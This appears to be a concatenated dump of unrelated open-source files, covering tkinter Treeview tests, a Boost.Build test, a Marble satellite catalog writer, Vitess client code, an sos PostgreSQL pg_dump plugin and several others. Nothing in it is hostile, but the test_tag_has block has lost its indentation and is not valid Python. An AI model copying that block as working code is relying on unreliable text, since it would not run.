            self.fail("The command associated to the treeview heading wasn't "
                "invoked.")
        # XXX The following raises an error in a tcl interpreter, but not in
        # Python
        #self.tv.heading('#0', command='I dont exist')
        #simulate_heading_click(5, 5)
    def test_index(self):
        """index() reflects an item's position among its siblings, keeps
        working for detached items, but fails after deletion."""
        # item 'what' doesn't exist
        self.assertRaises(tkinter.TclError, self.tv.index, 'what')
        self.assertEqual(self.tv.index(''), 0)
        item1 = self.tv.insert('', 'end')
        item2 = self.tv.insert('', 'end')
        c1 = self.tv.insert(item1, 'end')
        c2 = self.tv.insert(item1, 'end')
        self.assertEqual(self.tv.index(item1), 0)
        self.assertEqual(self.tv.index(c1), 0)
        self.assertEqual(self.tv.index(c2), 1)
        self.assertEqual(self.tv.index(item2), 1)
        self.tv.move(item2, '', 0)
        self.assertEqual(self.tv.index(item2), 0)
        self.assertEqual(self.tv.index(item1), 1)
        # check that index still works even after its parent and siblings
        # have been detached
        self.tv.detach(item1)
        self.assertEqual(self.tv.index(c2), 1)
        self.tv.detach(c1)
        self.assertEqual(self.tv.index(c2), 0)
        # but it fails after item has been deleted
        self.tv.delete(item1)
        self.assertRaises(tkinter.TclError, self.tv.index, c2)
    def test_insert_item(self):
        """insert() argument validation plus round-tripping of unicode values,
        tags, values containing spaces, and item text."""
        # parent 'none' doesn't exist
        self.assertRaises(tkinter.TclError, self.tv.insert, 'none', 'end')
        # open values
        self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
            open='')
        self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
            open='please')
        self.assertFalse(self.tv.delete(self.tv.insert('', 'end', open=True)))
        self.assertFalse(self.tv.delete(self.tv.insert('', 'end', open=False)))
        # invalid index
        self.assertRaises(tkinter.TclError, self.tv.insert, '', 'middle')
        # trying to duplicate item id is invalid
        itemid = self.tv.insert('', 'end', 'first-item')
        self.assertEqual(itemid, 'first-item')
        self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
            'first-item')
        self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
            MockTclObj('first-item'))
        # unicode values
        value = '\xe1ba'
        item = self.tv.insert('', 'end', values=(value, ))
        self.assertEqual(self.tv.item(item, 'values'),
            (value,) if self.wantobjects else value)
        self.assertEqual(self.tv.item(item, values=None),
            (value,) if self.wantobjects else value)
        self.tv.item(item, values=self.root.splitlist(self.tv.item(item, values=None)))
        self.assertEqual(self.tv.item(item, values=None),
            (value,) if self.wantobjects else value)
        self.assertIsInstance(self.tv.item(item), dict)
        # erase item values
        self.tv.item(item, values='')
        self.assertFalse(self.tv.item(item, values=None))
        # item tags
        item = self.tv.insert('', 'end', tags=[1, 2, value])
        self.assertEqual(self.tv.item(item, tags=None),
            ('1', '2', value) if self.wantobjects else
            '1 2 %s' % value)
        self.tv.item(item, tags=[])
        self.assertFalse(self.tv.item(item, tags=None))
        self.tv.item(item, tags=(1, 2))
        self.assertEqual(self.tv.item(item, tags=None),
            ('1', '2') if self.wantobjects else '1 2')
        # values with spaces
        item = self.tv.insert('', 'end', values=('a b c',
            '%s %s' % (value, value)))
        self.assertEqual(self.tv.item(item, values=None),
            ('a b c', '%s %s' % (value, value)) if self.wantobjects else
            '{a b c} {%s %s}' % (value, value))
        # text
        self.assertEqual(self.tv.item(
            self.tv.insert('', 'end', text="Label here"), text=None),
            "Label here")
        self.assertEqual(self.tv.item(
            self.tv.insert('', 'end', text=value), text=None),
            value)
    def test_set(self):
        """set() reads/writes per-column cell values, tracking changes to the
        displayed columns; unknown columns or items raise TclError."""
        self.tv['columns'] = ['A', 'B']
        item = self.tv.insert('', 'end', values=['a', 'b'])
        self.assertEqual(self.tv.set(item), {'A': 'a', 'B': 'b'})
        self.tv.set(item, 'B', 'a')
        self.assertEqual(self.tv.item(item, values=None),
            ('a', 'a') if self.wantobjects else 'a a')
        self.tv['columns'] = ['B']
        self.assertEqual(self.tv.set(item), {'B': 'a'})
        self.tv.set(item, 'B', 'b')
        self.assertEqual(self.tv.set(item, column='B'), 'b')
        self.assertEqual(self.tv.item(item, values=None),
            ('b', 'a') if self.wantobjects else 'b a')
        self.tv.set(item, 'B', 123)
        self.assertEqual(self.tv.set(item, 'B'),
            123 if self.wantobjects else '123')
        self.assertEqual(self.tv.item(item, values=None),
            (123, 'a') if self.wantobjects else '123 a')
        self.assertEqual(self.tv.set(item),
            {'B': 123} if self.wantobjects else {'B': '123'})
        # inexistent column
        self.assertRaises(tkinter.TclError, self.tv.set, item, 'A')
        self.assertRaises(tkinter.TclError, self.tv.set, item, 'A', 'b')
        # inexistent item
        self.assertRaises(tkinter.TclError, self.tv.set, 'notme')
    def test_tag_bind(self):
        """tag_bind() event bindings fire for every item carrying the tag:
        simulate press/release clicks on both tagged rows and check that each
        produced the expected (press, release) event pair."""
        events = []
        item1 = self.tv.insert('', 'end', tags=['call'])
        item2 = self.tv.insert('', 'end', tags=['call'])
        self.tv.tag_bind('call', '<ButtonPress-1>',
            lambda evt: events.append(1))
        self.tv.tag_bind('call', '<ButtonRelease-1>',
            lambda evt: events.append(2))
        self.tv.pack()
        self.tv.wait_visibility()
        self.tv.update()
        # Probe y coordinates until both rows have been located on screen.
        pos_y = set()
        found = set()
        for i in range(0, 100, 10):
            if len(found) == 2: # item1 and item2 already found
                break
            item_id = self.tv.identify_row(i)
            if item_id and item_id not in found:
                pos_y.add(i)
                found.add(item_id)
        self.assertEqual(len(pos_y), 2) # item1 and item2 y pos
        for y in pos_y:
            simulate_mouse_click(self.tv, 0, y)
        # by now there should be 4 things in the events list, since each
        # item had a bind for two events that were simulated above
        self.assertEqual(len(events), 4)
        for evt in zip(events[::2], events[1::2]):
            self.assertEqual(evt, (1, 2))
    def test_tag_configure(self):
        """tag_configure() parameter passing: set, query (positional and
        keyword forms), and rejection of unknown options."""
        # Just testing parameter passing for now
        self.assertRaises(TypeError, self.tv.tag_configure)
        self.assertRaises(tkinter.TclError, self.tv.tag_configure,
            'test', sky='blue')
        self.tv.tag_configure('test', foreground='blue')
        self.assertEqual(str(self.tv.tag_configure('test', 'foreground')),
            'blue')
        self.assertEqual(str(self.tv.tag_configure('test', foreground=None)),
            'blue')
        self.assertIsInstance(self.tv.tag_configure('test'), dict)
def test_tag_has(self):
item1 = self.tv.insert('', 'end', text='Item 1', tags=['tag1'])
item2 = self.tv.insert('', 'end', text='Item 2', tags=['tag2'])
self.assertRaises(TypeError, self.tv.tag_has)
self.assertRaises(TclError, self.tv.tag_has, 'tag1', 'non-existing')
self.assertTrue(self.tv.tag_has('tag1', item1))
self.assertFalse(self.tv.tag_has('tag1', item2))
self.assertFalse(self.tv.tag_has('tag2', item1))
self.assertTrue(self.tv.tag_has('tag2', item2))
self.assertFalse(self.tv.tag_has('tag3', item1))
self.assertFalse(self.tv.tag_has('tag3', item2))
self.assertEqual(self.tv.tag_has('tag1'), (item1,))
self.assertEqual(self.tv.tag_has('tag2'), (item2,))
self.assertEqual(self.tv.tag_has('tag3'), ())
@add_standard_options(StandardTtkOptionsTests)
class SeparatorTest(AbstractWidgetTest, unittest.TestCase):
    # Options exercised by the standard ttk option tests added by the
    # add_standard_options decorator.
    OPTIONS = (
        'class', 'cursor', 'orient', 'style', 'takefocus',
        # 'state'?
    )
    # Separators are horizontal unless configured otherwise.
    default_orient = 'horizontal'
    def create(self, **kwargs):
        """Return the ttk.Separator instance under test."""
        return ttk.Separator(self.root, **kwargs)
@add_standard_options(StandardTtkOptionsTests)
class SizegripTest(AbstractWidgetTest, unittest.TestCase):
    # Options exercised by the standard ttk option tests added by the
    # add_standard_options decorator.
    OPTIONS = (
        'class', 'cursor', 'style', 'takefocus',
        # 'state'?
    )
    def create(self, **kwargs):
        """Return the ttk.Sizegrip instance under test."""
        return ttk.Sizegrip(self.root, **kwargs)
# Test classes collected by the tkinter test harness (presumably consumed
# by a test_main/run_unittest driver elsewhere in the package -- confirm).
tests_gui = (
        ButtonTest, CheckbuttonTest, ComboboxTest, EntryTest,
        FrameTest, LabelFrameTest, LabelTest, MenubuttonTest,
        NotebookTest, PanedWindowTest, ProgressbarTest,
        RadiobuttonTest, ScaleTest, ScrollbarTest, SeparatorTest,
        SizegripTest, TreeviewTest, WidgetTest,
        )
if __name__ == "__main__":
    unittest.main()
|
albmarvil/The-Eternal-Sorrow | refs/heads/master | dependencies/luabind/boost-build/test/alternatives.py | 4 | #!/usr/bin/python
# Copyright 2003 Dave Abrahams
# Copyright 2003, 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Test main target alternatives.
from BoostBuild import Tester
from string import find
t = Tester()
# Test that basic alternatives selection works.
t.write("project-root.jam", " ")
t.write("Jamfile", """
exe a : a_empty.cpp ;
exe a : a.cpp : <variant>release ;
""")
t.write("a_empty.cpp", "")
t.write("a.cpp", "int main() { return 0; }\n")
t.run_build_system("release")
t.expect_addition("bin/$toolset/release/a.exe")
# Test that alternative selection works for ordinary
# properties, in particular user-defined.
t.write("project-root.jam", " ")
t.write("Jamfile", """
import feature ;
feature.feature X : off on : propagated ;
exe a : b.cpp ;
exe a : a.cpp : <X>on ;
""")
t.write("b.cpp", "int main() { return 0; }\n")
t.rm("bin")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/b.obj")
t.run_build_system("X=on")
t.expect_addition("bin/$toolset/debug/X-on/a.obj")
t.rm("bin")
# Test that everything works ok even with default
# build.
t.write("Jamfile", """
exe a : a_empty.cpp : <variant>release ;
exe a : a.cpp : <variant>debug ;
""")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/a.exe")
# Test that only properties which are in the build request
# matter when selecting an alternative. IOW, an alternative
# with <variant>release is better than one with
# <variant>debug when building the release variant.
t.write("Jamfile", """
exe a : a_empty.cpp : <variant>debug ;
exe a : a.cpp : <variant>release ;
""")
t.run_build_system("release")
t.expect_addition("bin/$toolset/release/a.exe")
# Test that free properties do not matter. We really don't
# want <cxxflags> property in build request to affect
# alternative selection.
t.write("Jamfile", """
exe a : a_empty.cpp : <variant>debug <define>FOO <include>BAR ;
exe a : a.cpp : <variant>release ;
""")
t.rm("bin/$toolset/release/a.exe")
t.run_build_system("release define=FOO")
t.expect_addition("bin/$toolset/release/a.exe")
# Test that ambiguity is reported correctly.
t.write("Jamfile", """
exe a : a_empty.cpp ;
exe a : a.cpp ;
""")
t.run_build_system("--no-error-backtrace", status=None)
t.fail_test(find(t.stdout(), "No best alternative") == -1)
# Another ambiguity test: two matching properties in one alternative are
# neither better nor worse than a single one in another alternative.
t.write("Jamfile", """
exe a : a_empty.cpp : <optimization>off <profiling>off ;
exe a : a.cpp : <debug-symbols>on ;
""")
t.run_build_system("--no-error-backtrace", status=None)
t.fail_test(find(t.stdout(), "No best alternative") == -1)
# Test that we can have an alternative without sources.
t.write("Jamfile", """
alias specific-sources ;
import feature ;
feature.extend os : MAGIC ;
alias specific-sources : b.cpp : <os>MAGIC ;
exe a : a.cpp specific-sources ;
""")
t.rm("bin")
t.run_build_system()
t.cleanup()
|
calincru/marble | refs/heads/master | tools/gen-sat-catalog/lib/ObjectCatalog.py | 9 | #
# This file is part of the Marble Virtual Globe.
#
# This program is free software licensed under the GNU LGPL. You can
# find a copy of this license in LICENSE.txt in the top directory of
# the source code.
#
# Copyright 2012 Rene Kuettner <rene@bitkanal.net>
#
from __future__ import print_function
from lxml import etree
from lxml.builder import ElementMaker
from SpaceObject import SpaceObject
class ObjectCatalog(object):
    """Builds the Marble satellite catalog XML file.

    The catalog is an <msc:MarbleSatelliteCatalog> document; add() appends
    one <satellite> element per space object, write() serializes the tree
    to the output file opened in the constructor.
    """
    def __init__(self, filename, baseURL):
        super(ObjectCatalog, self).__init__()
        self._filename = filename;
        # Base URL prepended to per-object resources (only used by the
        # commented-out allvectors/icon attributes in add()).
        self._baseURL = baseURL
        self._file = None
        self._open()
        self._initXML();
    def __del__(self):
        # Best-effort cleanup: release the output file handle.
        self._close()
    def add(self, space_obj, latest_vector):
        """Append a <satellite> element for space_obj.

        latest_vector is a sequence (mjd, x, y, z, vx, vy, vz): index 0 is
        the modified Julian date, 1-3 the position, 4-6 the velocity.
        """
        #url = self._baseURL + "/" + space_obj.filename_prefix + '.txt'
        #icon = self._baseURL + "/" + space_obj.filename_prefix + '.png'
        satellite = self._E.satellite(
            self._E.name(space_obj.name),
            self._E.category(space_obj._category),
            self._E.relatedBody(space_obj.related_body),
            self._E.stateVector(
                self._E.position(
                    x=str(latest_vector[1]),
                    y=str(latest_vector[2]),
                    z=str(latest_vector[3])
                ),
                self._E.velocity(
                    x=str(latest_vector[4]),
                    y=str(latest_vector[5]),
                    z=str(latest_vector[6])
                ),
                mjd=str(latest_vector[0])
            ),
            #allvectors=url,
            #icon=icon,
        )
        # Mission start/end are optional; only emit <mission> if at least
        # one of them is known.
        mission = self._E.mission()
        if space_obj.mission_start is not None:
            mission.append(self._E.start(str(space_obj.mission_start)))
        if space_obj.mission_end is not None:
            mission.append(self._E.end(str(space_obj.mission_end)))
        if len(mission):
            satellite.append(mission)
        self._xml.append(satellite)
        print(space_obj.name + " added to object catalog.")
    def write(self):
        """Serialize the XML tree to the catalog file."""
        print("Writing catalog to file: " + self._filename)
        # NOTE(review): etree.tostring(..., encoding='utf-8') returns bytes
        # while the file is opened in text mode ('w+'); this fails on
        # Python 3 -- confirm the tool targets Python 2 only, or open the
        # file in binary mode.
        self._file.write(etree.tostring(self._xml,
                                        pretty_print=True,
                                        xml_declaration=True,
                                        encoding='utf-8'))
    def _initXML(self):
        """Create the ElementMaker and the empty catalog root element."""
        self._E = ElementMaker(
            namespace="http://marble.kde.org/satellitecatalog",
            nsmap={'msc' : "http://marble.kde.org/satellitecatalog"})
        self._xml = self.MarbleSatelliteCatalog() if False else self._E.MarbleSatelliteCatalog()
    def _open(self):
        """Open (and truncate) the output catalog file."""
        self._file = open(self._filename, 'w+')
        self._file.truncate()
    def _close(self):
        self._file.close()
|
bennylope/django-site-contacts | refs/heads/master | contact/urls.py | 1 | from django.conf.urls.defaults import patterns, url
from django.views.generic import TemplateView
from .views import SimpleContactView
# Contact form URLs: the form view at the root, and a static "sent" page.
# NOTE(review): django.conf.urls.defaults / patterns() were removed in
# Django 1.10 -- confirm the supported Django version before upgrading.
urlpatterns = patterns('',
    url(r'^$', view=SimpleContactView.as_view(), name="contact_form"),
    url(r'^sent/$',
        view=TemplateView.as_view(template_name="contact/contact_success.html"),
        name="contact_success"),
)
|
tirsen/vitess | refs/heads/master | py/vtctl/vtctl_client.py | 12 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module defines the vtctl client interface.
"""
import logging
# mapping from protocol to python class. The protocol matches the string
# used by vtctlclient as a -vtctl_client_protocol parameter.
vtctl_client_conn_classes = {}


def register_conn_class(protocol, c):
  """Register a VtctlClient implementation under a protocol name.

  Implementations call this at import time so connect() can find them.

  Args:
    protocol: short string to document the protocol.
    c: class to register.
  """
  vtctl_client_conn_classes[protocol] = c
def connect(protocol, *pargs, **kargs):
  """Return a dialed VtctlClient connection to a vtctl server.

  Args:
    protocol: the registered protocol to use.
    *pargs: passed to the registered protocol __init__ method.
    **kargs: passed to the registered protocol __init__ method.

  Returns:
    A dialed VtctlClient.

  Raises:
    ValueError: if the protocol is unknown.
  """
  try:
    conn_class = vtctl_client_conn_classes[protocol]
  except KeyError:
    raise ValueError('Unknown vtctl protocol', protocol)
  conn = conn_class(*pargs, **kargs)
  conn.dial()
  return conn
class Event(object):
  """Event is streamed by VtctlClient.

  Eventually, we will just use the proto3 definition for logutil.proto/Event.
  """

  # Severity levels; CONSOLE marks raw console output to be returned to
  # the caller rather than logged.
  INFO = 0
  WARNING = 1
  ERROR = 2
  CONSOLE = 3

  def __init__(self, time, level, file, line, value):
    """Store one log event.

    Args:
      time: event timestamp.
      level: one of the level constants above.
      file: source file that emitted the event.
      line: source line that emitted the event.
      value: the message payload.
    """
    self.time = time
    self.level = level
    self.file = file
    self.line = line
    self.value = value
class VtctlClient(object):
  """VtctlClient is the interface for the vtctl client implementations.

  All implementations must implement all these methods.
  If something goes wrong with the connection, this object will be thrown out.
  """

  def __init__(self, addr, timeout):
    """Initialize a vtctl connection.

    Args:
      addr: server address. Can be protocol dependent.
      timeout: connection timeout (float, in seconds).
    """
    pass

  def dial(self):
    """Dial to the server. If successful, call close() to close the connection.
    """
    pass

  def close(self):
    """Close the connection. This object may be re-used again by calling dial().
    """
    pass

  def is_closed(self):
    """Checks the connection status.

    Returns:
      True if this connection is closed.
    """
    pass

  def execute_vtctl_command(self, args, action_timeout=30.0):
    """Executes a remote command on the vtctl server.

    Args:
      args: Command line to run.
      action_timeout: total timeout for the action (float, in seconds).

    Returns:
      This is a generator method that yields Event objects.
    """
    pass
def execute_vtctl_command(client, args, action_timeout=30.0,
                          info_to_debug=False):
  """Helper that runs a remote vtctl command through a client.

  Log events are forwarded to the logging module; console events are
  collected and returned as a single string.

  Args:
    client: VtctlClient object to use.
    args: Command line to run.
    action_timeout: total timeout for the action (float, in seconds).
    info_to_debug: if set, changes the info messages to debug.

  Returns:
    The console output of the action.
  """
  console_chunks = []
  for event in client.execute_vtctl_command(args, action_timeout=action_timeout):
    if event.level == Event.CONSOLE:
      console_chunks.append(event.value)
    elif event.level == Event.INFO:
      log = logging.debug if info_to_debug else logging.info
      log('%s', event.value)
    elif event.level == Event.WARNING:
      logging.warning('%s', event.value)
    elif event.level == Event.ERROR:
      logging.error('%s', event.value)
  return ''.join(console_chunks)
|
jdurbin/sandbox | refs/heads/master | python/heatmap/heatest_scipi.py | 1 | #!/usr/bin/env python
import scipy
import pylab
import scipy.cluster.hierarchy as sch
# Generate random features and distance matrix.
# scipy.rand/scipy.zeros were deprecated NumPy aliases (removed from modern
# SciPy), so use numpy directly; the pairwise |x_i - x_j| matrix is computed
# with one vectorized broadcast instead of the O(n^2) Python loop.
import numpy

x = numpy.random.rand(40)
D = numpy.abs(x[:, numpy.newaxis] - x[numpy.newaxis, :])
# Compute and plot first dendrogram (left side, row clustering).
fig = pylab.figure(figsize=(8,8))
ax1 = fig.add_axes([0.09,0.1,0.2,0.6])
Y = sch.linkage(D, method='centroid')
Z1 = sch.dendrogram(Y, orientation='right')
ax1.set_xticks([])
ax1.set_yticks([])
# Compute and plot second dendrogram (top, column clustering).
ax2 = fig.add_axes([0.3,0.71,0.6,0.2])
Y = sch.linkage(D, method='single')
Z2 = sch.dendrogram(Y)
ax2.set_xticks([])
ax2.set_yticks([])
# Plot distance matrix, reordered so rows follow the first dendrogram's
# leaf order and columns follow the second's.
axmatrix = fig.add_axes([0.3,0.1,0.6,0.6])
idx1 = Z1['leaves']
idx2 = Z2['leaves']
D = D[idx1,:]
D = D[:,idx2]
im = axmatrix.matshow(D, aspect='auto', origin='lower', cmap=pylab.cm.YlGnBu)
axmatrix.set_xticks([])
axmatrix.set_yticks([])
# Plot colorbar for the distance scale.
axcolor = fig.add_axes([0.91,0.1,0.02,0.6])
pylab.colorbar(im, cax=axcolor)
fig.show()
fig.savefig('dendrogram.png') |
asm-products/cloudroutes-service | refs/heads/master | src/web/reactionforms/docker-restart-container/__init__.py | 2 | """Reactions form class for email notifications."""
from wtforms import SelectField, TextAreaField, TextField
from wtforms.validators import DataRequired, Optional
from ..base import BaseReactForm
class ReactForm(BaseReactForm): #pylint: disable=no-init
    ''' Form for the "Docker: Restart Container" reaction. '''
    title = "Docker: Restart Container"
    description = """
    <p>This reaction will open an SSH connection to the specified host and restart a Docker container. If the container is running it will be stopped, and started; if the container is not running it will be started fresh.</p>
    <p>The SSH connection is authenticated by an SSH key; it is recommended that you generate a unique SSH public/private key pair for this purpose. The <code>Gateway</code> field can be used to specify a bastion or "jump" host; this setting will cause the reaction to first SSH to the specified <code>Gateway</code> host and then SSH to the specified target host.</p>
    """
    # Shared placeholder/help text inherited from the base reaction form.
    placeholders = BaseReactForm.placeholders
    field_descriptions = BaseReactForm.descriptions
    # Docker container to restart on the target host.
    container_name = TextField(
        "Container Name",
        description=field_descriptions['docker']['container_name'],
        validators=[DataRequired(message='Container Name is a required field')])
    # SSH connection settings.
    host_string = TextField(
        "Target Host",
        description=field_descriptions['ssh']['host_string'],
        validators=[DataRequired(message='Target Host is a required field')])
    gateway = TextField(
        "Gateway Host",
        description=field_descriptions['ssh']['gateway'],
        validators=[Optional()])
    username = TextField(
        "Username",
        description=field_descriptions['ssh']['username'],
        validators=[DataRequired(message="Username is a required field")])
    sshkey = TextAreaField(
        "SSH Private Key",
        description=field_descriptions['ssh']['sshkey'],
        validators=[DataRequired(message='SSH Key is a required field')])
    use_sudo = SelectField(
        "Use Sudo",
        description=field_descriptions['ssh']['use_sudo'],
        choices=[('true', 'True'), ('false', 'False')],
        validators=[DataRequired(message="Use Sudo is a required field")])
    # Whether the reaction triggers on true or false monitor results.
    call_on = SelectField(
        'Call On',
        description=field_descriptions['callon'],
        choices=[('false', 'False Monitors'), ('true', 'True Monitors')],
        validators=[DataRequired(message='Call on is a required field.')])
if __name__ == '__main__':
    # Module is only ever imported by the reactions framework; no CLI entry.
    pass
|
lmiccini/sos | refs/heads/master | sos/plugins/postgresql.py | 3 | # Copyright (C) 2014 Red Hat, Inc., Sandro Bonazzola <sbonazzo@redhat.com>
# Copyright (C) 2013 Chris J Arges <chris.j.arges@canonical.com>
# Copyright (C) 2012-2013 Red Hat, Inc., Bryn M. Reeves <bmr@redhat.com>
# Copyright (C) 2011 Red Hat, Inc., Jesse Jaggars <jjaggars@redhat.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
import os
import tempfile
from sos.plugins import Plugin, RedHatPlugin, UbuntuPlugin, DebianPlugin
from sos.utilities import find
class PostgreSQL(Plugin):
    """PostgreSQL RDBMS"""

    plugin_name = "postgresql"
    profiles = ('services',)
    packages = ('postgresql',)
    # Scratch directory holding the pg_dump archive; created lazily in
    # setup() and removed again in postproc().
    tmp_dir = None
    password_warn_text = " (password visible in process listings)"
    option_list = [
        ('pghome', 'PostgreSQL server home directory.', '', '/var/lib/pgsql'),
        ('username', 'username for pg_dump', '', 'postgres'),
        ('password', 'password for pg_dump' + password_warn_text, '', False),
        ('dbname', 'database name to dump for pg_dump', '', ''),
        ('dbhost', 'database hostname/IP (do not use unix socket)', '', ''),
        ('dbport', 'database server port number', '', '5432')
    ]

    def pg_dump(self):
        """Dump the configured database to a tar archive in tmp_dir and
        register it for collection."""
        dest_file = os.path.join(self.tmp_dir, "sos_pgdump.tar")
        # We're only modifying this for ourself and our children so there
        # is no need to save and restore environment variables if the user
        # decided to pass the password on the command line.
        if self.get_option("password") is not False:
            os.environ["PGPASSWORD"] = str(self.get_option("password"))
        # NOTE(review): option values are interpolated into the command
        # string unquoted; values containing spaces or shell metacharacters
        # will break the command -- confirm call_ext_prog's argument
        # handling before relying on untrusted option values.
        if self.get_option("dbhost"):
            cmd = "pg_dump -U %s -h %s -p %s -w -f %s -F t %s" % (
                self.get_option("username"),
                self.get_option("dbhost"),
                self.get_option("dbport"),
                dest_file,
                self.get_option("dbname")
            )
        else:
            # No host given: connect via the local unix socket; -C adds
            # the CREATE DATABASE statement to the dump.
            cmd = "pg_dump -C -U %s -w -f %s -F t %s " % (
                self.get_option("username"),
                dest_file,
                self.get_option("dbname")
            )
        result = self.call_ext_prog(cmd)
        if (result['status'] == 0):
            self.add_copy_spec(dest_file)
        else:
            self._log_error(
                "Unable to execute pg_dump. Error(%s)" % (result['output'])
            )
            self.add_alert(
                "ERROR: Unable to execute pg_dump. Error(%s)" %
                (result['output'])
            )

    def setup(self):
        """Run pg_dump when a database name and password were supplied."""
        if self.get_option("dbname"):
            if self.get_option("password") or "PGPASSWORD" in os.environ:
                self.tmp_dir = tempfile.mkdtemp()
                self.pg_dump()
            else:
                self.soslog.warning(
                    "password must be supplied to dump a database."
                )
                self.add_alert(
                    "WARN: password must be supplied to dump a database."
                )

    def postproc(self):
        """Remove the temporary dump directory created in setup()."""
        import shutil
        if self.tmp_dir:
            try:
                shutil.rmtree(self.tmp_dir)
            except shutil.Error:
                self.soslog.exception(
                    "Unable to remove %s." % (self.tmp_dir)
                )
                self.add_alert("ERROR: Unable to remove %s." % (self.tmp_dir))
class RedHatPostgreSQL(PostgreSQL, RedHatPlugin):

    def setup(self):
        super(RedHatPostgreSQL, self).setup()

        pghome = self.get_option("pghome")
        # Collect PostgreSQL log and configuration files found anywhere
        # under the server home directory.
        for pattern in ("*.log", "*.conf"):
            for filename in find(pattern, pghome):
                self.add_copy_spec(filename)
        # Cluster metadata from the data directory.
        for name in ("PG_VERSION", "postmaster.opts"):
            self.add_copy_spec(os.path.join(pghome, "data", name))
class DebianPostgreSQL(PostgreSQL, DebianPlugin, UbuntuPlugin):

    def setup(self):
        """Collect Debian/Ubuntu layout: logs, per-cluster configs and
        cluster metadata files."""
        super(DebianPostgreSQL, self).setup()
        self.add_copy_spec([
            "/var/log/postgresql/*.log",
            "/etc/postgresql/*/main/*.conf",
            "/var/lib/postgresql/*/main/PG_VERSION",
            "/var/lib/postgresql/*/main/postmaster.opts"
        ])
# vim: et ts=4 sw=4
|
smart-techs/you-get | refs/heads/develop | src/you_get/cli_wrapper/player/wmp.py | 12133432 | |
elkingtonmcb/django | refs/heads/master | tests/gis_tests/data/rasters/__init__.py | 12133432 | |
feliperfranca/django-nonrel-example | refs/heads/master | django/conf/locale/es/__init__.py | 12133432 | |
ukanga/SickRage | refs/heads/master | lib/hachoir_core/event_handler.py | 188 | class EventHandler(object):
"""
Class to connect events to event handlers.
"""
    def __init__(self):
        """Create an empty registry of event handlers."""
        # Maps event_name -> list of callables invoked by raiseEvent().
        self.handlers = {}
def connect(self, event_name, handler):
"""
Connect an event handler to an event. Append it to handlers list.
"""
try:
self.handlers[event_name].append(handler)
except KeyError:
self.handlers[event_name] = [handler]
def raiseEvent(self, event_name, *args):
"""
Raiser an event: call each handler for this event_name.
"""
if event_name not in self.handlers:
return
for handler in self.handlers[event_name]:
handler(*args)
|
atollena/commons | refs/heads/master | src/python/twitter/checkstyle/plugins/newlines.py | 14 | # ==================================================================================================
# Copyright 2014 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import ast
from ..common import CheckstylePlugin
class Newlines(CheckstylePlugin):
  """Check PEP8-style blank-line separation between definitions.

  Emits T302 when a top-level def/class is not preceded by exactly two
  blank lines, and T301 when a method inside a class is not preceded by
  exactly one blank line.
  """

  def iter_toplevel_defs(self):
    """Yield every top-level function or class definition of the file."""
    for node in self.python_file.tree.body:
      # Idiom fix: a single isinstance() call with a tuple of types
      # replaces the chained isinstance(...) or isinstance(...) test.
      if isinstance(node, (ast.FunctionDef, ast.ClassDef)):
        yield node

  def previous_blank_lines(self, line_number):
    """Count blank lines immediately preceding line_number.

    Comment lines neither break nor extend the run of blank lines; the
    count stops at the first non-blank, non-comment line.
    """
    blanks = 0
    while line_number > 1:
      line_number -= 1
      line_value = self.python_file.lines[line_number].strip()
      if line_value.startswith('#'):
        continue
      if line_value:
        break
      blanks += 1
    return blanks

  def nits(self):
    """Yield style nits for blank-line violations in the file."""
    # Top-level definitions need two preceding blank lines (unless they
    # start within the first two lines of the file).
    for node in self.iter_toplevel_defs():
      previous_blank_lines = self.previous_blank_lines(node.lineno)
      if node.lineno > 2 and previous_blank_lines != 2:
        yield self.error('T302', 'Expected 2 blank lines, found %d' % previous_blank_lines,
                         node)
    # Methods need one preceding blank line (except the first statement
    # directly following the class header).
    for node in self.iter_ast_types(ast.ClassDef):
      for subnode in node.body:
        if not isinstance(subnode, ast.FunctionDef):
          continue
        previous_blank_lines = self.previous_blank_lines(subnode.lineno)
        if subnode.lineno - node.lineno > 1 and previous_blank_lines != 1:
          yield self.error('T301', 'Expected 1 blank lines, found %d' % previous_blank_lines,
                           subnode)
|
orbitfp7/nova | refs/heads/master | nova/tests/unit/api/openstack/compute/contrib/test_flavorextradata.py | 63 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from oslo_serialization import jsonutils
import webob
from nova.compute import flavors
from nova import test
from nova.tests.unit.api.openstack import fakes
def fake_get_flavor_by_flavor_id(flavorid, ctxt=None):
